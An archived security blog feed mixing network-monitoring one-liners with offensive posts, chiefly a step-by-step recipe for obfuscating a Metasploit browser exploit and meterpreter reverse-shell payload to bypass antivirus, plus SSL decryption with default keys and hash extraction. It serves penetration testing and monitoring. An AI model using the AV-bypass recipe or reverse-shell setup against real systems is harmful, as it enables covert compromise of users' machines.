tag:blogger.com,1999:blog-32226857062527942024-03-13T05:37:08.139-04:00GREP:8000 Electronic Research LabNetwork Security MonitoringGrephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-3222685706252794.post-6816103124699317072011-02-19T11:58:00.002-05:002011-02-19T11:58:50.088-05:00Pwn Plug article on InfoSec Island!<div style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.infosecisland.com/blogview/11828-Wheres-My-Creeper-Box.html">https://www.infosecisland.com/blogview/11828-Wheres-My-Creeper-Box.html</a> </span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-44159898823956407742010-12-20T20:28:00.000-05:002010-12-20T20:28:20.818-05:00Using default private keys to decrypt SSL streams<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">An old but hugely overlooked issue. Many appliance vendors ship their units with a default private key for SSL communications. Even if you reissue a new certificate, your appliance could still be using the same private key as everyone else's.. and it's typically bundled within the firmware packages publicly distributed by the application vendor. This affects everything from DD-WRT to enterprise class VPN appliances, tape libraries, and firewalls.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Well, someone has finally begun cataloguing these into a searchable database:</span><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/%20"><span style="font-family: "Trebuchet MS",sans-serif;">http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/ </span></a><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> </span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Just lookup the device in question, point the lookup tool to a running appliance, or feed it a packet capture or live network interface and it will provide any known private keys.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Once the private key is obtained, you can decrypt the SSL stream with tshark:</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><b><span style="font-family: "Trebuchet MS",sans-serif;">tshark -nn -t ad -r <pcap_file> -o ssl.keys_list:<https_server_ip>,443,http,"<private_key.pem>" -V -R http</private_key.pem></https_server_ip></pcap_file></span></b><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Note: For successful decryption, the initial full SSL handshake must be present in the capture. A full SSL handshake contains ClientHello, ServerHello, Certificate, ServerHelloDone. If you only see ClientHello, ServerHello, ChangeCipherspec, this is a continuation of a previously established SSL session and cannot be decrypted as is.</span></span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-9638578711891030852010-12-03T10:44:00.000-05:002010-12-03T10:44:29.806-05:00Meterpreter scripts for RunAs privilege escalation & other mischief<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>send_keystrokes.rb: </b>Meterpreter script to interactively send keystrokes to an open application window using the vbscript SendKeys method. Can be used to escalate privileges into RunAs-invoked command shells on XP.<b> </b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><br />
</div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>IE_click_run.rb:</b> Meterpreter script to interactively click "Run" at the IE "File Download Security Warning" prompts. Can be used to escalate privileges into RunAs-invoked IE instances without end-user interaction</span><span style="font-size: small;"> on XP</span><span style="font-size: small;">.</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><br />
</div><div style="font-family: "Trebuchet MS",sans-serif;"><a href="http://code.google.com/p/metscripts/downloads/list"><span style="font-size: small;">http://code.google.com/p/metscripts/downloads/list</span></a><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><a href="http://grep8000.blogspot.com/2010/04/windows-privilege-escalation-talk.html">http://grep8000.blogspot.com/2010/04/windows-privilege-escalation-talk.html</a></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-53401654844043171012010-12-03T08:58:00.005-05:002010-12-03T09:26:36.847-05:00JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip</span>:<br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Module options:</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"> Name Current Setting Required Description</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> ---- --------------- -------- -----------</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SRVHOST 10.20.30.40 yes The local host to listen on.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SRVPORT 80 yes The local port to listen on.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SSL false no Negotiate SSL for incoming connections</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SSLVersion SSL3 no Specify the version of SSL that should be used</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> URIPATH /example no The URI to use for this exploit (default is random)</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Payload options (windows/meterpreter/reverse_tcp):</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"> Name Current Setting Required Description</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> ---- --------------- -------- -----------</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> EXITFUNC process yes Exit technique: seh, thread, none, process</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> LHOST 10.20.30.40 yes The listen address</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> LPORT 443 yes The listen port</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Exploit target:</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"> Id Name</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> -- ----</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> 0 Automatic</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">2. "exploit" to start the HTTP server (port 80) and payload handler (port 443).<br />
3. WGET the exploit URI using the --user-agent option to specify the user-agent string of the browser you're targeting. Example for IE7 on XP targets:</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">4. View the HTML source and copy all JavaScript between the "script" tags.</span></span><br />
<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">5. Feed to a JavaScript obfuscator of your liking. Examples:<br />
<br />
<a href="http://www.daftlogic.com/projects-online-javascript-obfuscator.htm">http://www.daftlogic.com/projects-online-javascript-obfuscator.htm</a><br />
<a href="http://javascriptcompressor.com/">http://javascriptcompressor.com</a><br />
<a href="http://dean.edwards.name/weblog/2007/04/packer3">http://dean.edwards.name/weblog/2007/04/packer3</a><br />
<br />
6. Copy obfuscated JS into a new HTML file.<br />
7. Start a new multi/handler to receive the meterpreter_reverse_tcp shell on port 443 (or whatever your payload requires).</span><span style="font-family: "Trebuchet MS",sans-serif;"><br />
8. Serve your newly obfuscated HTML from BT4 through Apache, or clone a site with SET and edit the embedded iFrame tag to point to your HTML file.<br />
<br />
Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}</span><br />
<span style="font-family: "Trebuchet MS",sans-serif;">Thanks to Will Metcalf for pointing me in the right direction!</span><br />
<br />
<b><span style="font-family: "Trebuchet MS",sans-serif;">References:</span></b><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/"><span style="font-family: "Trebuchet MS",sans-serif;">http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/</span></a><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html"><span style="font-family: "Trebuchet MS",sans-serif;">http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html</span></a><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html"><span style="font-family: "Trebuchet MS",sans-serif;">http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html</span></a></span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com1tag:blogger.com,1999:blog-3222685706252794.post-84301091578178152822010-07-09T20:56:00.020-04:002010-11-01T19:47:04.276-04:00Introducing.. the Pwn Plug!<div style="font-family: 'Trebuchet MS',sans-serif;"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SWiPiaE1SeekVZKnA9QmX8opD12jN9-t11IYyogm6pHNjxusj8dPaWJpPPD0s7s_FS3GmisLVxaEVQlfnPKqbMTu7BLlRgAyOuDUa-9SCdhhQCJ_v5fS4S7JH6zFJrIuOnLDDqHhBVg/s1600/sheevaplug.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SWiPiaE1SeekVZKnA9QmX8opD12jN9-t11IYyogm6pHNjxusj8dPaWJpPPD0s7s_FS3GmisLVxaEVQlfnPKqbMTu7BLlRgAyOuDUa-9SCdhhQCJ_v5fS4S7JH6zFJrIuOnLDDqHhBVg/s200/sheevaplug.jpg" width="200" /></a></div><span style="font-size: small;"></span><br />
<span style="font-size: small;">A SheevaPlug microserver loaded <br />
with pentesting goodness!<br />
<br />
<br />
<br />
<br />
<br />
<br />
:: Preloaded with Ubuntu, Metasploit, Fasttrack, SET, SSLstrip, nmap, dsniff, netcat, nikto, nbtscan, xprobe2, inguma, scapy, ettercap, JTR, medusa, & more<br />
:: Maintains a reverse persistent SSH tunnel to your external pentest box, with support for tunneling over HTTP and ICMP<br />
:: Traverses strict egress firewall filters, webfilters, HTTP proxies, and application-aware firewalls<br />
:: Unpingable & no open ports in stealth mode<br />
:: 4.3 x 2.7 x 1.9 inches, 2.3 watts when idle<br />
:: 1.2GHz ARM cpu with 512M SDRAM, 512M flash HDD</span><span style="font-size: small;"></span><br />
<br />
</div><div style="font-family: 'Trebuchet MS',sans-serif;"><span style="font-size: small;"><br />
</span></div><span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">Now selling through Rocket Bear Labs: <a href="http://www.rocketbearlabs.com/pwn-plug.html">http://www.rocketbearlabs.com/pwn-plug.html</a></span></span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com4tag:blogger.com,1999:blog-3222685706252794.post-47470088690299327412010-06-13T18:01:00.003-04:002010-06-13T18:08:12.210-04:00Decoding OpenLDAP & IBM Directory Server password hashes<span style="font-size: small;">OpenLDAP {SHA} hashes are base64-encoded hex byte-arrays of the SHA hash. Example:</span><br />
<span style="font-size: small;">userpassword:: {SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=<br />
<br />
The original SHA hash can be extracted from this with the help of fdump (<a href="http://sourceforge.net/projects/fdump/files/">http://sourceforge.net/projects/fdump/files/</a>):</span><br />
<span style="font-size: small;">echo -n W6ph5Mm5Pz8GgiULbPgzG37mj9g= |base64 -d - |fdump -<br />
<br />
IBM Directory Server, while based on OpenLDAP, implements a botched version of this. Instead of base64 encoding the SHA hash only, they encode the "{SHA}" prefix as well. Example:</span><br />
<span style="font-size: small;">userpassword:: e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A==<br />
<br />
The SHA hash can be extracted in the same manner by cutting the hex for "{SHA}" (7b 53 48 41 7d) from the result:</span><br />
<span style="font-size: small;">echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11-<br />
<br />
FTW, let's convert the IBM Directory Server userpassword field back to the OpenLDAP format:</span><br />
<span style="font-size: small;">echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11- |xxd -r -p |base64 |awk '{print"{SHA}"$1}'<br />
<br />
This is called "taking it back". At $30,000 per IBM Directory Server license, I highly recommend it!</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-77541662014675215362010-06-13T16:56:00.003-04:002010-07-22T14:04:16.905-04:00Windows privilege escalation talk at first Defcon 802!Slide deck is available here: <a href="http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf">http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf<br />
<br />
</a>DC802: <a href="http://dc802.org/?p=64">http://dc802.org/?p=64</a><a href="http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf"><br />
</a>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-83173446491624078572010-04-18T20:13:00.001-04:002010-07-22T14:05:30.137-04:00Windows Privilege Escalation Talk - BSides BostonPresented on Saturday, April 24, 4pm @ Security BSides Boston:<br />
<br />
# <b>Title: Escalating privileges through Secondary Logon (RunAs) processes</b><br />
<br />
<b># Abstract:</b> The scenario: You target a sysadmin PC and obtain a backdoor shell through a browser exploit, PDF with embedded payload, or similar client-side vector. However, because the organization is using RunAs best practices, your shell is running with limited user privileges. Some RunAs-invoked programs are running under the sysadmin's Domain Admin account, but you can't directly migrate to these processes from a limited user shell. The RunAs framework indicates that a user-level process should not be allowed to send commands to a greater privilege process. Sounds fairly solid, but as always, there are exceptions..<br />
<br />
Slide deck is available here: <a href="http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf">http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf</a><br />
<br />
bSides Boston: <a href="http://www.securitybsides.com/BSidesBostonTalks">http://www.securitybsides.com/BSidesBostonTalks</a>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-52729879373481132062009-09-09T22:04:00.005-04:002009-09-09T22:11:19.067-04:00Forensics: Recovering a 12-year old floppy disk with DD<span style="font-family: trebuchet ms; font-size: small;">True story. Earlier this year I was handed a 12-year old floppy disk loaded with bad sectors and unmountable due to a missing/corrupted partition table. A lost cause? Nope. DD can still image the raw media, skipping unreadable sectors and padding the output file with zeros to keep file structures intact wherever possible. <br />
<br />
I booted up a Helix Live CD and ran:<br />
<strong>dcfldd if=/dev/fd0 of=floppy.img bs=4k conv=noerror,sync</strong><br />
<br />
After much grinding and hissing, DD finished with a fully intact 1.4MB floppy disk image. Almost made me want to scour through my old floppy collection. Almost..</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com1tag:blogger.com,1999:blog-3222685706252794.post-73173348387793440432009-08-22T19:16:00.002-04:002009-08-22T19:18:02.676-04:00NSM: Parsing HTTP sessions with tcpflow<span style="font-family: trebuchet ms; font-size: small;"><b>:: Show HTTP requests, replies, etc:</b> tcpflow -i <i>[interface]</i> -c -s port 80 | grep HTTP</span><br />
<span style="font-family: trebuchet ms; font-size: small;"><b>:: Show all readable HTTP strings: </b>tcpflow -i <i>[interface]</i> -c -s port 80 | grep -v "\.\."</span><br />
<span style="font-family: trebuchet ms; font-size: small;"><b>:: Save HTTP flows to local files:</b> tcpflow -i <i>[interface]</i> -s port 80</span><br />
<span style="font-family: trebuchet ms; font-size: small;"><br />
</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-2454136226994283712009-08-22T18:43:00.008-04:002009-08-22T19:11:59.387-04:00NSM: PI detection with grep utils<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;">Here's a simple way to monitor network traffic for compliance with </span><span style="font-size: small;">state & federal privacy regulations</span><span style="font-size: small;">. Monitoring is especially important on perimeter ISP links, where PI can be seen flying naked into the public Internet.. how embarrassing!</span><br />
<br />
<span style="font-size: small;">These Ngrep commands will detect unencrypted SSNs and credit card numbers passing through a network:</span><span style="font-size: small;"><br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Spaced SSNs: </b>ngrep -d [interface] -q -t '(\s|^)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2]) \d{2} \d{4}(\s|$)'<br />
<b>:: Dashed SSNs: </b>ngrep -d </span><span style="font-size: small;">[interface]</span><span style="font-size: small;"> -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'<br />
<b>:: Dashed CCs (16-digit):</b> </span><span style="font-size: small;">ngrep -d </span><span style="font-size: small;">[interface]</span><span style="font-size: small;"> -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})-\d{4}-\d{4}-\d{4}(\s|$)'</span><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: small;">:: Non-spaced </span><span style="font-size: small;">CCs (16-digit)</span></b><span style="font-size: small;"><b>: </b>ngrep -d </span><span style="font-size: small;">[interface]</span><span style="font-size: small;"> -q -t '(\s|^)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})\d{12}(\s|$)'</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><br />
<span style="font-size: small;">Storing unencrypted PI on disk is also a big no-no. Here's how to detect these:</span><br />
<br />
<span style="font-size: small;"><b>:: Spaced/dashed SSNs: </b></span><span style="font-size: small;">pcregrep -r "(\D?\W)([0-6]\d\d|7[0-256]\d|73[0-3]|77[0-2])( |-)\d{2}( |-)\d{4}\D" [folder/drive/network path to search]</span><br />
<span style="font-size: small;"><b>:: Spaced/dashed CCs:</b> pcregrep -r "(\D?\W)(6011|5[1-5]\d{2}|4\d{3}|3\d{3})( |-)\d{4}( |-)\d{4}( |-)\d{4}\D" [folder/drive/network path to search]</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-30690902206443208662009-08-22T17:49:00.003-04:002009-08-22T17:54:09.827-04:00NSM: Simple network change detection with nmap<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;">I run this daily to see network adds/changes. </span><span style="font-size: small;">MAC address changes are also detected, which is useful for spotting ARP cache poisoning and changes to system hardware. </span><br />
<span style="font-size: small;"><br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>1. Create a baseline list of network hosts: </b><br />
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt<br />
grep -v # temp.txt | grep -v "appears to be down" > baseline_hosts.txt<br />
rm temp.txt<br />
<br />
<b> 2. Then, save an updated list of hosts, and compare this against the baseline list:</b><br />
nmap -R -sP --system-dns 192.168.1.* -oN temp.txt<br />
grep -v # temp.txt | grep -v "appears to be down" > current_hosts.txt<br />
rm temp.txt<br />
grep -v -x -F -f baseline_hosts.txt current_hosts.txt</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-76028086475913311932009-08-22T17:09:00.001-04:002009-08-22T17:54:38.221-04:00NSM: Web/email traffic analysis with Bro-IDS<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 email senders: </b>grep "FROM: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 email recipients: </b>grep "TO: " [Bro_mime.log] | egrep -o "\w+@[a-zA-Z_]+?\.[a-zA-Z]{2,6}" | sort | uniq -c | sort -nr | head -n 10<b> <br />
</b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 web browser/client apps: </b>cat [Bro_http.log] | grep -i user-agent | cut -f6- -d' ' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 web servers (based on HTTP objects): </b>cat [Bro_http.log] | grep "HOST: " | awk '{ print$5 }' | sort | uniq -c | sort -nr | head -n 10 <br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b></b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 DNS A-record queries: </b>cat [Bro_dns.log] | grep "query ?A" | awk '{ print$6 }' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 HTTP server response codes: </b>cat [Bro_http.log] | pcregrep -o '\(\d{3} "' | cut -c 2-5 | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: HTTP POST/GET counts: </b>cat [Bro_http.log] | pcregrep -o "POST|GET" | sort | uniq -c | sort -nr</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b></b></span><span style="font-size: small;"><b><br />
</b></span><span style="font-size: small;"><b></b></span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-38466411949473610902009-08-22T16:30:00.001-04:002009-08-22T18:01:06.659-04:00NSM: Top 10s with Argus!<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Top 10 web servers: </b>ra -nn -r [argus_file] -s daddr - tcp and dst port 80 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 FTP servers: </b>ra -nn -r [argus_file] -s daddr - tcp and dst port 21 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10<b> <br />
</b></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 SMTP servers: </b>ra -nn -r [argus_file] -s daddr - tcp and dst port 25 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 SMTP clients: </b>ra -nn -r [argus_file] -s saddr - tcp and dst port 25 </span><span style="font-size: small;">| awk '{print$1}' </span><span style="font-size: small;">| sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b></b></span><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 protocols: </b>ra -n -r [argus_file] -s proto | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 TCP ports: </b>ra -nn -r [argus_file] -s dport - tcp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 UDP ports: </b></span><span style="font-size: small;">ra -nn -r [argus_file] -s dport - udp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10 </span><span style="font-size: small;"> <br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 source (client) IPs: </b>ra -nn -r [argus_file] -s saddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 destination (server) IPs: </b>ra -nn -r [argus_file] </span><span style="font-size: small;">-s daddr - not arp | awk '{print$1}' | sort | uniq -c | sort -nr | head -n 10</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: </b></span><span style="font-size: small;"><b>Top 10 host-pairs: </b>ra -nn -r [argus_file] -s proto saddr dir daddr | grep -v man | awk '{print$2$3$4}' | sort | uniq -c | sort -nr | head -n 10</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-37194069839274838502009-08-22T15:12:00.002-04:002009-08-22T18:02:50.455-04:00NSM: SSL handshake analysis with ssldump<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Total SSL Handshakes:</b> ssldump -n -r <i>[capture_file]</i> | grep Handshake | wc -l</span><span style="font-size: small;"> <br />
</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Total ClientHellos:</b> ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep ClientHello | wc -l</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: List SSL versions negotiated: </b>ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep Version | sort | uniq -c | sort -nr</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: List CipherSuites negotiated: </b>ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep "cipherSuite" | sort | uniq -c | sort -nr</span><br />
<span style="font-size: small;"><b>:: List ServerHello events: </b>ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep "ServerHello" | sort | uniq -c | sort -nr</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>:: Total ChangeCipherSpec events:</b> ssldump -n -r <i>[</i></span><span style="font-size: small;"><i>capture</i></span><span style="font-size: small;"><i>_file]</i> | grep ChangeCipherSpec | wc -l</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-75685949246289602752008-07-29T17:43:00.000-04:002009-08-22T14:56:45.011-04:00Hardware Hacking: Ghetto wifi bridge<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBYQdiW6Kx7hS3zNFJmPXmr646FEwKAywYBNld9bdEtj31GhOVuvYCy_OsD2cR8aeNyHobATADKfXqNVRvze_Mcpj7F3nK3BjxF1WOv6LFFxi8qjKJaYFROr5zTkcdcR1hQ0QpA5ftPA/s1600-h/gw2.JPG"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5228555369858638834" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaBYQdiW6Kx7hS3zNFJmPXmr646FEwKAywYBNld9bdEtj31GhOVuvYCy_OsD2cR8aeNyHobATADKfXqNVRvze_Mcpj7F3nK3BjxF1WOv6LFFxi8qjKJaYFROr5zTkcdcR1hQ0QpA5ftPA/s400/gw2.JPG" style="float: left; margin: 0px 10px 10px 0px;" /></a><br />
<div><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2odNm6S9EYj-d7406A1ADCchGdDZ4DYpIlYpWZjLQxWqPkiV1d0OOXMdKk6qJZL7Qf9rkXXesAXToYUREShPo7c4T1-7uGmJObO0JbwtDsaPtZTQG98xJ1-AAcFNRwqqGdnx-6zh-zfY/s1600-h/gw2.JPG"></a><br />
<br />
<div></div></div><br />
